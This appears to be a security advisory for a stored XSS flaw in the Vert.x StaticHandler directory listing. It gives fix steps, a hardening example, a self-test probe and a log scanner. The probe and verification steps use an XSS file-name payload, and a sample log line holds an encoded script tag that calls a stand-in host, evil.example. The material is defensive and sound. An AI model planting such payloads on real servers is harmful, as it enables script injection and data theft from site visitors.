CVE-2025-11966

6.4 MEDIUM

📋 TL;DR

This stored XSS vulnerability in Eclipse Vert.x (the StaticHandler of the vertx-web module) allows attackers to inject malicious scripts into directory listings when they can create or rename files in served paths: the file name is written into the listing HTML without encoding. Users viewing these directory listings execute the attacker's script in their browser context. Affects Vert.x deployments with directory listing enabled.

💻 Affected Systems

Products:
  • Eclipse Vert.x
Versions: 4.0.0 through 4.5.21, 5.0.0 through 5.0.4
Operating Systems: All
Default Config Vulnerable: ✅ No
Notes: Only vulnerable when directory listing feature is explicitly enabled in configuration.

📦 What is this software?

Eclipse Vert.x is a toolkit for building reactive applications on the JVM. The vulnerable component is StaticHandler in the vertx-web module, which serves static files from a web root and, when enabled, renders an HTML listing of a directory's contents.

⚠️ Risk & Real-World Impact

🔴 Worst Case

Attackers steal session cookies (where they are not HttpOnly), perform actions in the application as the viewing user, or redirect users to attacker-controlled sites and downloads.

🟠 Likely Case

Session hijacking, credential theft, or defacement of directory listing pages through script injection.

🟢 If Mitigated

No exposure if directory listing is disabled: the listing is never rendered, so the file name is never reflected. If listing must stay on, impact is limited when file names written into served paths are restricted to a safe character set and the listing HTML-encodes names.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires the ability to create or rename files or directories under a served path (for example through an upload feature, a shared volume, or another write primitive) on a deployment that has directory listing enabled. The attacker does not have to be the user who views the listing; any user who browses the directory runs the payload.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Vert.x 4.5.22 and 5.0.5

Vendor Advisory: https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303

Restart Required: Yes (the fix is a library upgrade; the application must be rebuilt and redeployed, which restarts the JVM)

Instructions:

1. Update Vert.x to 4.5.22 or later on the 4.x line, or 5.0.5 or later on the 5.x line. The fixed code is in vertx-web (StaticHandler), so make sure that artifact, not only vertx-core, resolves to the fixed version.
2. Update the dependency versions in your project (pom.xml, build.gradle, or the Vert.x BOM if you use one).
3. Rebuild and redeploy the application.

🔧 Temporary Workarounds

Disable directory listing

Applies to: all

Turn off the directory listing feature in the StaticHandler configuration. Listing is off by default; it is on only where the application calls StaticHandler.setDirectoryListing(true).

Set StaticHandler.create(...).setDirectoryListing(false) (or remove the setDirectoryListing(true) call) on every route that serves a directory untrusted parties can write to.

Restrict file names at the write path

Applies to: all

The listing is generated from names already on the filesystem, so request middleware in front of StaticHandler cannot sanitize it. Instead, validate the client-supplied file name wherever files are created or renamed into a served path (upload and rename endpoints) against an allowlist such as [A-Za-z0-9._-] and reject anything else; or replace the built-in listing with your own handler that HTML-encodes names before emitting them.

🧯 If You Can't Patch

  • Disable directory listing on every StaticHandler route immediately; this removes the rendering path entirely
  • A WAF inspecting the listing GET sees nothing suspicious (the payload is already on disk), so put filtering on the write path instead: block upload or rename requests whose file name contains <, >, ", ', & or their percent-encoded forms
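Both workarounds above in code, as an added example that is not code from this page or from the Vert.x project: a StaticHandler with listing explicitly disabled shown next to the weak setting, and an upload route that enforces a file-name allowlist before moving the upload into the served tree. It assumes vertx-web 4.5.x or 5.0.x (where StaticHandler.create(FileSystemAccess.ROOT, dir) is available); the directory paths and the /upload and /files routes are hypothetical.

```java
import io.vertx.core.Vertx;
import io.vertx.ext.web.FileUpload;
import io.vertx.ext.web.Router;
import io.vertx.ext.web.handler.BodyHandler;
import io.vertx.ext.web.handler.FileSystemAccess;
import io.vertx.ext.web.handler.StaticHandler;

import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.List;
import java.util.regex.Pattern;

public class HardenedStaticServing {

  // Allowlist for names of files written into a served directory: must start with a
  // letter or digit (so no ".", ".." or dotfiles), then only [A-Za-z0-9._-], at most
  // 255 characters. HTML metacharacters ('<', '>', '"', '&', ...) and path separators
  // fail this check and never reach the filesystem.
  static final Pattern SAFE_NAME = Pattern.compile("^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$");

  static boolean isSafeFileName(String name) {
    return name != null && SAFE_NAME.matcher(name).matches();
  }

  public static void main(String[] args) {
    // Hypothetical directories; adjust to the deployment.
    Path servedDir = Paths.get("/srv/app/public/uploads");
    Path uploadTmp = Paths.get("/srv/app/upload-tmp");

    Vertx vertx = Vertx.vertx();
    Router router = Router.router(vertx);

    // Weak setting that makes the CVE reachable on affected versions: listing enabled
    // on a directory that untrusted parties can write into.
    //   StaticHandler.create(FileSystemAccess.ROOT, servedDir.toString()).setDirectoryListing(true)
    // Corrected setting: listing explicitly off (also the default).
    router.route("/files/*").handler(
        StaticHandler.create(FileSystemAccess.ROOT, servedDir.toString())
            .setDirectoryListing(false));

    // Write-path control: the client-supplied name is validated before the upload is
    // moved into the served tree. Temp files are cleaned up explicitly below.
    router.post("/upload")
        .handler(BodyHandler.create()
            .setUploadsDirectory(uploadTmp.toString())
            .setDeleteUploadedFilesOnEnd(false))
        .handler(ctx -> {
          List<FileUpload> uploads = ctx.fileUploads();
          if (uploads.size() != 1) {
            uploads.forEach(u -> vertx.fileSystem().delete(u.uploadedFileName()));
            ctx.response().setStatusCode(400).end("exactly one file expected");
            return;
          }
          FileUpload upload = uploads.get(0);
          String name = upload.fileName(); // name chosen by the client
          if (!isSafeFileName(name)) {
            vertx.fileSystem().delete(upload.uploadedFileName());
            ctx.response().setStatusCode(400).end("rejected file name");
            return;
          }
          Path dest = servedDir.resolve(name);
          vertx.fileSystem().move(upload.uploadedFileName(), dest.toString())
              .onSuccess(v -> ctx.response().setStatusCode(201).end("stored " + name))
              .onFailure(err -> ctx.fail(err));
        });

    vertx.createHttpServer().requestHandler(router).listen(8080);
  }
}
```

The allowlist is deliberately stricter than "no HTML characters": rejecting everything outside a small character set avoids having to enumerate every character that matters in HTML, URLs and shells, and it also blocks the path-separator and dotfile cases that tend to travel with the same upload primitive.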

🔍 How to Verify

Check if Vulnerable:

Find every StaticHandler in the code base and check whether any of them calls setDirectoryListing(true) (grep for setDirectoryListing); then confirm the resolved vertx-web version is within the affected range. Only the combination of an enabled listing on an affected version is vulnerable.

Check Version:

Check the resolved vertx-web (and vertx-core) version, e.g. mvn dependency:tree | grep vertx-web or gradle dependencies, rather than only the declared version in pom.xml or build.gradle, since a BOM or a transitive dependency may pin a different one.

Verify Fix Applied:

Confirm the resolved version is 4.5.22 or later (4.x) or 5.0.5 or later (5.x), then test: in a served directory with listing enabled, create a file whose name contains HTML, e.g. <img src=x onerror=alert(1)>.txt, request the directory with Accept: text/html, and check that the response contains the name HTML-encoded (&lt;img ...) rather than raw.
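The verification step above as a runnable probe, added here and not part of this page or of the Vert.x project: it starts a StaticHandler with listing enabled on a temporary directory containing a file whose name carries an HTML payload, fetches the listing as HTML, and reports whether the name came back raw. It assumes vertx-web 4.5.x or 5.0.x and JDK 11+ (java.net.http); the payload file name can only be created on POSIX filesystems, not on Windows.

```java
import io.vertx.core.Vertx;
import io.vertx.core.http.HttpServer;
import io.vertx.ext.web.Router;
import io.vertx.ext.web.handler.FileSystemAccess;
import io.vertx.ext.web.handler.StaticHandler;

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;
import java.nio.file.Files;
import java.nio.file.Path;

public class ListingXssProbe {

  // Constructed marker file name: harmless, but unmistakable if rendered unescaped.
  static final String PAYLOAD_NAME = "<img src=x onerror=alert(1)>.txt";

  public static void main(String[] args) throws Exception {
    Path webroot = Files.createTempDirectory("vertx-listing-probe");
    Files.createFile(webroot.resolve(PAYLOAD_NAME));
    Files.createFile(webroot.resolve("benign.txt"));

    Vertx vertx = Vertx.vertx();
    Router router = Router.router(vertx);
    // Listing deliberately enabled: this is the configuration under test.
    router.route("/files/*").handler(
        StaticHandler.create(FileSystemAccess.ROOT, webroot.toString())
            .setDirectoryListing(true)
            .setCachingEnabled(false));

    // Port 0 picks a free ephemeral port.
    HttpServer server = vertx.createHttpServer().requestHandler(router)
        .listen(0).toCompletionStage().toCompletableFuture().get();
    try {
      String body = fetch("http://localhost:" + server.actualPort() + "/files/");
      System.out.println(classify(body));
    } finally {
      vertx.close().toCompletionStage().toCompletableFuture().get();
    }
  }

  // StaticHandler chooses the listing format from the Accept header, so ask for HTML
  // explicitly; the JDK client sends no Accept header by default.
  static String fetch(String url) throws Exception {
    HttpClient client = HttpClient.newHttpClient();
    HttpRequest req = HttpRequest.newBuilder(URI.create(url))
        .header("Accept", "text/html")
        .build();
    return client.send(req, HttpResponse.BodyHandlers.ofString()).body();
  }

  static String classify(String body) {
    if (body.contains(PAYLOAD_NAME)) {
      return "VULNERABLE: file name rendered into the listing without HTML encoding";
    }
    if (body.contains("benign.txt")) {
      return "NOT VULNERABLE: listing served, marker name not rendered raw";
    }
    return "INCONCLUSIVE: listing did not include the test files (check the route and Accept header)";
  }
}
```

Run it against the vertx-web version your build resolves (the probe uses whatever is on the classpath), once before and once after the upgrade; the "NOT VULNERABLE" branch is the expected result on 4.5.22+ and 5.0.5+.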

📡 Detection & Monitoring

Log Indicators:

  • Files created or renamed in served directories whose names contain <, >, ", ', & or percent-encoded equivalents (%3C, %3E, %22)
  • Upload or rename requests whose file name field contains HTML metacharacters or script fragments (the listing GET itself carries no payload; the injection happens at write time)

Network Indicators:

  • HTTP responses containing unescaped HTML in directory listings
  • Script tags in directory listing responses

SIEM Query:

http.response.body:(*<script* OR *onerror=* OR *onload=*) AND url.path:*/

Match on the response body of directory requests (path ending in /) rather than on http.user_agent: the User-Agent header is the client's, so a *Vert.x* user-agent filter would never match traffic served by a Vert.x server. Field names are illustrative; map them to your SIEM's schema, and note that many pipelines do not capture response bodies at all, in which case the write-path indicators above are the practical signal.
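The first log indicator turned into detection logic, as an added example that is not from this page: it scans constructed upload-log lines in a hypothetical format, percent-decodes the client-supplied file name so encoded payloads are caught too, and flags names containing HTML metacharacters. Against real logs, the line regex would be replaced with your application's format.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class UploadNameScanner {

  // Constructed sample log in a hypothetical format (not a Vert.x format):
  //   <ISO timestamp> <method> <path> <status> filename="<client-supplied name>"
  static final String[] SAMPLE_LOG = {
      "2025-10-20T10:01:02Z POST /upload 201 filename=\"quarterly-report.pdf\"",
      "2025-10-20T10:02:11Z POST /upload 201 filename=\"<img src=x onerror=alert(1)>.txt\"",
      "2025-10-20T10:03:45Z POST /upload 201 filename=\"%3Cscript%3Efetch('//evil.example')%3C/script%3E.png\"",
      "2025-10-20T10:04:09Z GET /files/ 200 filename=\"\"",
      "2025-10-20T10:05:30Z POST /upload 201 filename=\"notes.txt\"",
  };

  static final Pattern LINE = Pattern.compile(
      "^(\\S+) (\\S+) (\\S+) (\\d{3}) filename=\"([^\"]*)\"$");

  // Characters that matter once a name is interpolated into an HTML listing.
  static final Pattern HTML_META = Pattern.compile("[<>\"'&]");

  /** Returns one "timestamp decodedName" entry per flagged upload line. */
  static List<String> scan(String[] lines) {
    List<String> hits = new ArrayList<>();
    for (String line : lines) {
      Matcher m = LINE.matcher(line);
      // Only write-path requests carry the injected name; listing GETs are skipped.
      if (!m.matches() || !m.group(2).equals("POST")) continue;
      String decoded = safeDecode(m.group(5));
      if (HTML_META.matcher(decoded).find()) {
        hits.add(m.group(1) + " " + decoded);
      }
    }
    return hits;
  }

  // Decode percent-encoding so "%3Cscript" is judged like "<script"; a malformed
  // escape sequence is kept raw rather than dropping the line.
  static String safeDecode(String s) {
    try {
      return URLDecoder.decode(s, StandardCharsets.UTF_8);
    } catch (IllegalArgumentException e) {
      return s;
    }
  }

  public static void main(String[] args) {
    for (String hit : scan(SAMPLE_LOG)) {
      System.out.println("FLAGGED " + hit);
    }
  }
}
```

On the sample above the second and third lines are flagged and the others are not; the GET line is skipped even though a real listing response would be where the payload renders, because the log carries no response body.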

🔗 References

  • Eclipse vulnerability report: https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/303